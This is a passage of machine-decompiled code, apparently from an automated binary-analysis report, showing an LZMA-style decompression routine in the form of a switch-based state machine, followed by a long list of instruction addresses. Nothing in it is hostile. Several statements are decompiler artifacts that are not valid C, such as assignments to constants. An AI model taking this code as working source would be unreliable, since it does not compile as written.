                                                                                    							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                    							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                    							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                    								L10:
                                                                                    								if(_t613 == 0) {
                                                                                    									L12:
                                                                                    									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                    									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                    									goto L15;
                                                                                    								} else {
                                                                                    									goto L11;
                                                                                    								}
                                                                                    								do {
                                                                                    									L11:
                                                                                    									_t613 = _t613 - 1;
                                                                                    									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                    								} while (_t613 != 0);
                                                                                    								goto L12;
                                                                                    							}
                                                                                    							if( *(_t614 - 4) != 0) {
                                                                                    								GlobalFree( *(_t614 - 4));
                                                                                    							}
                                                                                    							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    							 *(_t614 - 4) = _t534;
                                                                                    							if(_t534 == 0) {
                                                                                    								goto L171;
                                                                                    							} else {
                                                                                    								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                    								goto L10;
                                                                                    							}
                                                                                    						case 1:
                                                                                    							L13:
                                                                                    							__eflags =  *(_t614 - 0x6c);
                                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                                    								 *(_t614 - 0x88) = 1;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                    							_t45 = _t614 - 0x48;
                                                                                    							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                    							__eflags =  *_t45;
                                                                                    							L15:
                                                                                    							if( *(_t614 - 0x48) < 4) {
                                                                                    								goto L13;
                                                                                    							}
                                                                                    							_t546 =  *(_t614 - 0x40);
                                                                                    							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                    								L20:
                                                                                    								 *(_t614 - 0x48) = 5;
                                                                                    								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                    								goto L23;
                                                                                    							}
                                                                                    							 *(_t614 - 0x74) = _t546;
                                                                                    							if( *(_t614 - 8) != 0) {
                                                                                    								GlobalFree( *(_t614 - 8));
                                                                                    							}
                                                                                    							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                    							 *(_t614 - 8) = _t534;
                                                                                    							if(_t534 == 0) {
                                                                                    								goto L171;
                                                                                    							} else {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    						case 2:
                                                                                    							L24:
                                                                                    							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                    							 *(_t614 - 0x84) = 6;
                                                                                    							 *(_t614 - 0x4c) = _t553;
                                                                                    							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                    							goto L132;
                                                                                    						case 3:
                                                                                    							L21:
                                                                                    							__eflags =  *(_t614 - 0x6c);
                                                                                    							if( *(_t614 - 0x6c) == 0) {
                                                                                    								 *(_t614 - 0x88) = 3;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                    							_t67 = _t614 - 0x70;
                                                                                    							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                    							__eflags =  *_t67;
                                                                                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                    							L23:
                                                                                    							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                    							if( *(_t614 - 0x48) != 0) {
                                                                                    								goto L21;
                                                                                    							}
                                                                                    							goto L24;
                                                                                    						case 4:
                                                                                    							goto L133;
                                                                                    						case 5:
                                                                                    							goto L137;
                                                                                    						case 6:
                                                                                    							goto L0;
                                                                                    						case 7:
                                                                                    							__eflags =  *(__ebp - 0x40) - 1;
                                                                                    							if( *(__ebp - 0x40) != 1) {
                                                                                    								__eax =  *(__ebp - 0x24);
                                                                                    								 *(__ebp - 0x80) = 0x16;
                                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    								__eax =  *(__ebp - 0x28);
                                                                                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    								__eax =  *(__ebp - 0x2c);
                                                                                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    								__eax = 0;
                                                                                    								__eflags =  *(__ebp - 0x38) - 7;
                                                                                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    								__al = __al & 0x000000fd;
                                                                                    								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                    								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                    								__eax =  *(__ebp - 4);
                                                                                    								__eax =  *(__ebp - 4) + 0x664;
                                                                                    								__eflags = __eax;
                                                                                    								 *(__ebp - 0x58) = __eax;
                                                                                    								goto L68;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 4);
                                                                                    							__ecx =  *(__ebp - 0x38);
                                                                                    							 *(__ebp - 0x84) = 8;
                                                                                    							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                    							goto L132;
                                                                                    						case 8:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__eax =  *(__ebp - 4);
                                                                                    								__ecx =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x84) = 0xa;
                                                                                    								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                    							} else {
                                                                                    								__eax =  *(__ebp - 0x38);
                                                                                    								__ecx =  *(__ebp - 4);
                                                                                    								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                    								 *(__ebp - 0x84) = 9;
                                                                                    								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                    								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                    							}
                                                                                    							goto L132;
                                                                                    						case 9:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								goto L89;
                                                                                    							}
                                                                                    							__eflags =  *(__ebp - 0x60);
                                                                                    							if( *(__ebp - 0x60) == 0) {
                                                                                    								goto L171;
                                                                                    							}
                                                                                    							__eax = 0;
                                                                                    							__eflags =  *(__ebp - 0x38) - 7;
                                                                                    							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                    							__eflags = _t258;
                                                                                    							0 | _t258 = _t258 + _t258 + 9;
                                                                                    							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                    							goto L75;
                                                                                    						case 0xa:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__eax =  *(__ebp - 4);
                                                                                    								__ecx =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x84) = 0xb;
                                                                                    								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                    								goto L132;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x28);
                                                                                    							goto L88;
                                                                                    						case 0xb:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__ecx =  *(__ebp - 0x24);
                                                                                    								__eax =  *(__ebp - 0x20);
                                                                                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    							} else {
                                                                                    								__eax =  *(__ebp - 0x24);
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x28);
                                                                                    							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    							L88:
                                                                                    							__ecx =  *(__ebp - 0x2c);
                                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                                    							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    							L89:
                                                                                    							__eax =  *(__ebp - 4);
                                                                                    							 *(__ebp - 0x80) = 0x15;
                                                                                    							__eax =  *(__ebp - 4) + 0xa68;
                                                                                    							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                    							goto L68;
                                                                                    						case 0xc:
                                                                                    							L99:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0xc;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t334 = __ebp - 0x70;
                                                                                    							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t334;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							__eax =  *(__ebp - 0x2c);
                                                                                    							goto L101;
                                                                                    						case 0xd:
                                                                                    							goto L36;
                                                                                    						case 0xe:
                                                                                    							goto L45;
                                                                                    						case 0xf:
                                                                                    							goto L57;
                                                                                    						case 0x10:
                                                                                    							L109:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0x10;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t365 = __ebp - 0x70;
                                                                                    							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t365;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							goto L111;
                                                                                    						case 0x11:
                                                                                    							L68:
                                                                                    							__esi =  *(__ebp - 0x58);
                                                                                    							 *(__ebp - 0x84) = 0x12;
                                                                                    							goto L132;
                                                                                    						case 0x12:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								__eax =  *(__ebp - 0x58);
                                                                                    								 *(__ebp - 0x84) = 0x13;
                                                                                    								__esi =  *(__ebp - 0x58) + 2;
                                                                                    								goto L132;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x4c);
                                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                    							__ecx =  *(__ebp - 0x58);
                                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                                    							__eflags = __eax;
                                                                                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                    							goto L130;
                                                                                    						case 0x13:
                                                                                    							__eflags =  *(__ebp - 0x40);
                                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                                    								_t469 = __ebp - 0x58;
                                                                                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                    								__eflags =  *_t469;
                                                                                    								 *(__ebp - 0x30) = 0x10;
                                                                                    								 *(__ebp - 0x40) = 8;
                                                                                    								L144:
                                                                                    								 *(__ebp - 0x7c) = 0x14;
                                                                                    								goto L145;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x4c);
                                                                                    							__ecx =  *(__ebp - 0x58);
                                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                                    							 *(__ebp - 0x30) = 8;
                                                                                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                    							L130:
                                                                                    							 *(__ebp - 0x58) = __eax;
                                                                                    							 *(__ebp - 0x40) = 3;
                                                                                    							goto L144;
                                                                                    						case 0x14:
                                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                    							__eax =  *(__ebp - 0x80);
                                                                                    							goto L140;
                                                                                    						case 0x15:
                                                                                    							__eax = 0;
                                                                                    							__eflags =  *(__ebp - 0x38) - 7;
                                                                                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    							__al = __al & 0x000000fd;
                                                                                    							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                    							goto L120;
                                                                                    						case 0x16:
                                                                                    							__eax =  *(__ebp - 0x30);
                                                                                    							__eflags = __eax - 4;
                                                                                    							if(__eax >= 4) {
                                                                                    								_push(3);
                                                                                    								_pop(__eax);
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 4);
                                                                                    							 *(__ebp - 0x40) = 6;
                                                                                    							__eax = __eax << 7;
                                                                                    							 *(__ebp - 0x7c) = 0x19;
                                                                                    							 *(__ebp - 0x58) = __eax;
                                                                                    							goto L145;
                                                                                    						case 0x17:
                                                                                    							L145:
                                                                                    							__eax =  *(__ebp - 0x40);
                                                                                    							 *(__ebp - 0x50) = 1;
                                                                                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                    							goto L149;
                                                                                    						case 0x18:
                                                                                    							L146:
                                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0x18;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__ecx =  *(__ebp - 0x70);
                                                                                    							__eax =  *(__ebp - 0xc);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							_t484 = __ebp - 0x70;
                                                                                    							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                    							__eflags =  *_t484;
                                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    							L148:
                                                                                    							_t487 = __ebp - 0x48;
                                                                                    							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                    							__eflags =  *_t487;
                                                                                    							L149:
                                                                                    							__eflags =  *(__ebp - 0x48);
                                                                                    							if( *(__ebp - 0x48) <= 0) {
                                                                                    								__ecx =  *(__ebp - 0x40);
                                                                                    								__ebx =  *(__ebp - 0x50);
                                                                                    								0 = 1;
                                                                                    								__eax = 1 << __cl;
                                                                                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                    								__eax =  *(__ebp - 0x7c);
                                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                                    								goto L140;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x50);
                                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    							__eax =  *(__ebp - 0x58);
                                                                                    							__esi = __edx + __eax;
                                                                                    							 *(__ebp - 0x54) = __esi;
                                                                                    							__ax =  *__esi;
                                                                                    							__edi = __ax & 0x0000ffff;
                                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    								__cx = __ax;
                                                                                    								__cx = __ax >> 5;
                                                                                    								__eax = __eax - __ecx;
                                                                                    								__edx = __edx + 1;
                                                                                    								__eflags = __edx;
                                                                                    								 *__esi = __ax;
                                                                                    								 *(__ebp - 0x50) = __edx;
                                                                                    							} else {
                                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                                    								0x800 = 0x800 - __edi;
                                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    								 *__esi = __cx;
                                                                                    							}
                                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    								goto L148;
                                                                                    							} else {
                                                                                    								goto L146;
                                                                                    							}
                                                                                    						case 0x19:
                                                                                    							__eflags = __ebx - 4;
                                                                                    							if(__ebx < 4) {
                                                                                    								 *(__ebp - 0x2c) = __ebx;
                                                                                    								L119:
                                                                                    								_t393 = __ebp - 0x2c;
                                                                                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                    								__eflags =  *_t393;
                                                                                    								L120:
                                                                                    								__eax =  *(__ebp - 0x2c);
                                                                                    								__eflags = __eax;
                                                                                    								if(__eax == 0) {
                                                                                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                    									goto L170;
                                                                                    								}
                                                                                    								__eflags = __eax -  *(__ebp - 0x60);
                                                                                    								if(__eax >  *(__ebp - 0x60)) {
                                                                                    									goto L171;
                                                                                    								}
                                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                    								__eax =  *(__ebp - 0x30);
                                                                                    								_t400 = __ebp - 0x60;
                                                                                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                    								__eflags =  *_t400;
                                                                                    								goto L123;
                                                                                    							}
                                                                                    							__ecx = __ebx;
                                                                                    							__eax = __ebx;
                                                                                    							__ecx = __ebx >> 1;
                                                                                    							__eax = __ebx & 0x00000001;
                                                                                    							__ecx = (__ebx >> 1) - 1;
                                                                                    							__al = __al | 0x00000002;
                                                                                    							__eax = (__ebx & 0x00000001) << __cl;
                                                                                    							__eflags = __ebx - 0xe;
                                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                                    							if(__ebx >= 0xe) {
                                                                                    								__ebx = 0;
                                                                                    								 *(__ebp - 0x48) = __ecx;
                                                                                    								L102:
                                                                                    								__eflags =  *(__ebp - 0x48);
                                                                                    								if( *(__ebp - 0x48) <= 0) {
                                                                                    									__eax = __eax + __ebx;
                                                                                    									 *(__ebp - 0x40) = 4;
                                                                                    									 *(__ebp - 0x2c) = __eax;
                                                                                    									__eax =  *(__ebp - 4);
                                                                                    									__eax =  *(__ebp - 4) + 0x644;
                                                                                    									__eflags = __eax;
                                                                                    									L108:
                                                                                    									__ebx = 0;
                                                                                    									 *(__ebp - 0x58) = __eax;
                                                                                    									 *(__ebp - 0x50) = 1;
                                                                                    									 *(__ebp - 0x44) = 0;
                                                                                    									 *(__ebp - 0x48) = 0;
                                                                                    									L112:
                                                                                    									__eax =  *(__ebp - 0x40);
                                                                                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                    										_t391 = __ebp - 0x2c;
                                                                                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                    										__eflags =  *_t391;
                                                                                    										goto L119;
                                                                                    									}
                                                                                    									__eax =  *(__ebp - 0x50);
                                                                                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    									__eax =  *(__ebp - 0x58);
                                                                                    									__esi = __edi + __eax;
                                                                                    									 *(__ebp - 0x54) = __esi;
                                                                                    									__ax =  *__esi;
                                                                                    									__ecx = __ax & 0x0000ffff;
                                                                                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                    									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                    									if( *(__ebp - 0xc) >= __edx) {
                                                                                    										__ecx = 0;
                                                                                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                    										__ecx = 1;
                                                                                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                    										__ebx = 1;
                                                                                    										__ecx =  *(__ebp - 0x48);
                                                                                    										__ebx = 1 << __cl;
                                                                                    										__ecx = 1 << __cl;
                                                                                    										__ebx =  *(__ebp - 0x44);
                                                                                    										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                    										__cx = __ax;
                                                                                    										__cx = __ax >> 5;
                                                                                    										__eax = __eax - __ecx;
                                                                                    										__edi = __edi + 1;
                                                                                    										__eflags = __edi;
                                                                                    										 *(__ebp - 0x44) = __ebx;
                                                                                    										 *__esi = __ax;
                                                                                    										 *(__ebp - 0x50) = __edi;
                                                                                    									} else {
                                                                                    										 *(__ebp - 0x10) = __edx;
                                                                                    										0x800 = 0x800 - __ecx;
                                                                                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    										 *__esi = __dx;
                                                                                    									}
                                                                                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    										L111:
                                                                                    										_t368 = __ebp - 0x48;
                                                                                    										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                    										__eflags =  *_t368;
                                                                                    										goto L112;
                                                                                    									} else {
                                                                                    										goto L109;
                                                                                    									}
                                                                                    								}
                                                                                    								__ecx =  *(__ebp - 0xc);
                                                                                    								__ebx = __ebx + __ebx;
                                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                    									__ecx =  *(__ebp - 0x10);
                                                                                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    									__ebx = __ebx | 0x00000001;
                                                                                    									__eflags = __ebx;
                                                                                    									 *(__ebp - 0x44) = __ebx;
                                                                                    								}
                                                                                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    									L101:
                                                                                    									_t338 = __ebp - 0x48;
                                                                                    									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                    									__eflags =  *_t338;
                                                                                    									goto L102;
                                                                                    								} else {
                                                                                    									goto L99;
                                                                                    								}
                                                                                    							}
                                                                                    							__edx =  *(__ebp - 4);
                                                                                    							__eax = __eax - __ebx;
                                                                                    							 *(__ebp - 0x40) = __ecx;
                                                                                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                    							goto L108;
                                                                                    						case 0x1a:
                                                                                    							goto L55;
                                                                                    						case 0x1b:
                                                                                    							L75:
                                                                                    							__eflags =  *(__ebp - 0x64);
                                                                                    							if( *(__ebp - 0x64) == 0) {
                                                                                    								 *(__ebp - 0x88) = 0x1b;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							__eax =  *(__ebp - 0x14);
                                                                                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    							__eflags = __eax -  *(__ebp - 0x74);
                                                                                    							if(__eax >=  *(__ebp - 0x74)) {
                                                                                    								__eax = __eax +  *(__ebp - 0x74);
                                                                                    								__eflags = __eax;
                                                                                    							}
                                                                                    							__edx =  *(__ebp - 8);
                                                                                    							__cl =  *(__eax + __edx);
                                                                                    							__eax =  *(__ebp - 0x14);
                                                                                    							 *(__ebp - 0x5c) = __cl;
                                                                                    							 *(__eax + __edx) = __cl;
                                                                                    							__eax = __eax + 1;
                                                                                    							__edx = 0;
                                                                                    							_t274 = __eax %  *(__ebp - 0x74);
                                                                                    							__eax = __eax /  *(__ebp - 0x74);
                                                                                    							__edx = _t274;
                                                                                    							__eax =  *(__ebp - 0x68);
                                                                                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    							_t283 = __ebp - 0x64;
                                                                                    							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                    							__eflags =  *_t283;
                                                                                    							 *( *(__ebp - 0x68)) = __cl;
                                                                                    							goto L79;
                                                                                    						case 0x1c:
                                                                                    							while(1) {
                                                                                    								L123:
                                                                                    								__eflags =  *(__ebp - 0x64);
                                                                                    								if( *(__ebp - 0x64) == 0) {
                                                                                    									break;
                                                                                    								}
                                                                                    								__eax =  *(__ebp - 0x14);
                                                                                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    								__eflags = __eax -  *(__ebp - 0x74);
                                                                                    								if(__eax >=  *(__ebp - 0x74)) {
                                                                                    									__eax = __eax +  *(__ebp - 0x74);
                                                                                    									__eflags = __eax;
                                                                                    								}
                                                                                    								__edx =  *(__ebp - 8);
                                                                                    								__cl =  *(__eax + __edx);
                                                                                    								__eax =  *(__ebp - 0x14);
                                                                                    								 *(__ebp - 0x5c) = __cl;
                                                                                    								 *(__eax + __edx) = __cl;
                                                                                    								__eax = __eax + 1;
                                                                                    								__edx = 0;
                                                                                    								_t414 = __eax %  *(__ebp - 0x74);
                                                                                    								__eax = __eax /  *(__ebp - 0x74);
                                                                                    								__edx = _t414;
                                                                                    								__eax =  *(__ebp - 0x68);
                                                                                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                    								__eflags =  *(__ebp - 0x30);
                                                                                    								 *( *(__ebp - 0x68)) = __cl;
                                                                                    								 *(__ebp - 0x14) = __edx;
                                                                                    								if( *(__ebp - 0x30) > 0) {
                                                                                    									continue;
                                                                                    								} else {
                                                                                    									goto L80;
                                                                                    								}
                                                                                    							}
                                                                                    							 *(__ebp - 0x88) = 0x1c;
                                                                                    							goto L170;
                                                                                    					}
                                                                                    				}
                                                                                    			}













                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d5f
                                                                                    0x00406d64
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00000000
                                                                                    0x0040743e
                                                                                    0x00406d66
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00406f9a
                                                                                    0x00406fa0
